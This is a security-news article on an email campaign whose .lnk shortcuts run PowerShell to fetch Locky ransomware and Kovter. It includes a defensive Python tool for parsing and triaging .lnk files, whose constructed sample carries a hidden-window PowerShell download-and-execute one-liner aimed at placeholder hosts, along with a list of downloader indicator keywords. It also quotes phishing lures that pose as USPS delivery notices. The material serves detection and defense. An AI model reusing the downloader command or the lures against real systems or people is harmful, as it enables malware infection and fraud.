Improved Scripts Deliver Kovter and Locky

Computer criminals are running a new email campaign whose attachments deliver both Kovter and Locky to their targets.

Kovter And Locky Delivered In A New Wave Of Malware Campaigns


Computer criminals are using a new generation of scripts to install both Kovter and Locky on their targets' hosts. A few months ago security researchers noted an emerging email campaign distributing .lnk (Windows shortcut) files: when the shortcut is opened, it launches an embedded PowerShell command that downloads the Locky ransomware from a download site. A more complex version of this loader has now been discovered that fetches its payload from an extended list of sites and can deliver more than one malware family.

The new script carries no fewer than five hardcoded domains from which it attempts to download the payload; alongside the Locky ransomware it also delivers Kovter. Each request targets a specific path on the domain selected by a parameter value, and the hardcoded domains are tried in turn until a payload is successfully downloaded and run. If none of the domains returns a payload for that parameter value, the script moves on to the next value and repeats the attempt. Spreading the download over several domains and paths is meant to defeat URL filtering that would otherwise block the infection.
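Because the lure is a .lnk shortcut rather than a document macro, the quickest static check is to parse the shortcut itself: the Shell Link format (MS-SHLLINK) stores the target path and the full command line in plain StringData, so the PowerShell one-liner and its hardcoded hosts can be pulled out without executing anything. The following is an added example written for this article, not code from the original page or from Microsoft's analysis. It parses the header, optional IDList/LinkInfo blocks and StringData, then applies a simple triage rule (PowerShell target plus download indicators or a fan-out over several URLs). The indicator keyword list, the `.example` hosts and the whole sample shortcut are constructed for the demonstration and are assumptions, not indicators taken from the real campaign.

```python
"""Static triage of Windows Shell Link (.lnk) files that launch PowerShell.

Parses the MS-SHLLINK header and StringData to recover the link target and
the command-line arguments, then flags the PowerShell download-loop pattern
described above (several hardcoded hosts, each tried in turn).
"""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_MAGIC = b"\x4c\x00\x00\x00"                                  # HeaderSize == 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")    # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1) that change the layout of the file.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData sections, in the order the format stores them.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

URL_RE = re.compile(r"https?://[^\s'\"();,]+", re.I)
# Substrings typical of script downloaders. Assumed indicator list for the example, not exhaustive.
INDICATORS = ("-nop", "-w hidden", "-windowstyle hidden", "-ep bypass", "-executionpolicy bypass",
              "downloadfile", "downloadstring", "invoke-webrequest", "iex", "invoke-expression",
              "-enc", "frombase64string", "start-process")


def parse_lnk(data):
    """Return (link_flags, show_command, strings) for a Shell Link byte string."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != LNK_MAGIC or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize (u16) followed by opaque item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    strings = {}
    if flags & HAS_LINK_INFO:                       # LinkInfoSize (u32) covers the whole block
        info_size, _, info_flags, _, base_off = struct.unpack_from("<IIIII", data, pos)
        if info_flags & 0x01:                       # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            end = data.index(b"\x00", pos + base_off)
            strings["local_base_path"] = data[pos + base_off:end].decode("cp1252", "replace")
        pos += info_size
    for bit, name in STRING_FIELDS:                 # CountCharacters (u16) + characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if flags & IS_UNICODE:
            strings[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            strings[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return flags, show_command, strings


def triage_lnk(data):
    """Summarise what a .lnk would run and whether it looks like a PowerShell downloader."""
    _, show_command, s = parse_lnk(data)
    target = " ".join(s.get(k, "") for k in ("local_base_path", "relative_path")).strip()
    args = s.get("arguments", "")
    lowered = args.lower()
    urls = URL_RE.findall(args)
    hits = sorted(kw for kw in INDICATORS if kw in lowered)
    is_powershell = "powershell" in target.lower() or "powershell" in lowered
    return {
        "target": target,
        "show_command": show_command,               # 7 = SW_SHOWMINNOACTIVE, keeps the console out of sight
        "urls": urls,
        "indicators": hits,
        # Verdict: PowerShell plus either download indicators or a fan-out over several hosts.
        "suspicious": is_powershell and (bool(hits) or len(urls) > 1),
    }


def build_lnk(relative_path, arguments, show_command=7):
    """Build a minimal Unicode .lnk (no IDList/LinkInfo); used here only to construct the sample."""
    header = bytearray(LNK_HEADER_SIZE)
    header[0:4] = LNK_MAGIC
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 0x14, HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE)
    struct.pack_into("<I", header, 0x3C, show_command)
    body = b"".join(struct.pack("<H", len(v)) + v.encode("utf-16-le") for v in (relative_path, arguments))
    return bytes(header) + body


# Constructed sample mirroring the loop described above: five hardcoded hosts, one path parameter,
# first successful download wins. Hosts use the reserved .example TLD and resolve nowhere.
SAMPLE_ARGS = (
    "-nop -w hidden -ep bypass -c \"$h='http://d1.example','http://d2.example','http://d3.example',"
    "'http://d4.example','http://d5.example';foreach($u in $h){try{"
    "(New-Object Net.WebClient).DownloadFile($u+'/counter/?a=1',$env:TEMP+'\\x.exe');"
    "Start-Process ($env:TEMP+'\\x.exe');break}catch{}}\""
)
SAMPLE_LNK = build_lnk("..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", SAMPLE_ARGS)

if __name__ == "__main__":
    print(triage_lnk(SAMPLE_LNK))
```

On a real sample, read the attachment bytes and pass them to `triage_lnk`; the extracted URL list is the part worth feeding to the proxy blocklist, since the loader will keep trying the remaining hosts after the first one is taken down.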

Sample Kovter And Locky Email Bearing Messages

As usual the malicious scripts are delivered by email campaigns that rely on social engineering. Here is an example message that spoofs a USPS delivery notification:

Dear Roberto,

This is to confirm that your item has been shipped at January 24.

Review the document that is attached to this e-mail!

Thank you for your assistance in this matter, Marion Wooodard, USPS Mail Delivery Clerk.

Another sample message reads the following:

Dear Norma,

We can not deliver your parcel arrived at January 20.

Please check the attachment for details!

Best regards,

Wayne Christensen,

USPS Mail Delivery Clerk.

Once the downloaded payload runs, the outcome depends on which family was fetched. Locky starts its encryption engine and encrypts the user's data with a strong cipher; depending on the Locky strain, a different extension is appended to the encrypted files: .zepto, .odin, .thor, .aesir or .osiris. Kovter, by contrast, is a click-fraud trojan known for fileless persistence in the Windows registry, so a host that received it may show no ransom note at all.

For more information about this emerging threat you can read Microsoft’s detailed post.



Author : Martin Beltov

Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast he enjoys writing about the latest threats and mechanisms of intrusion.

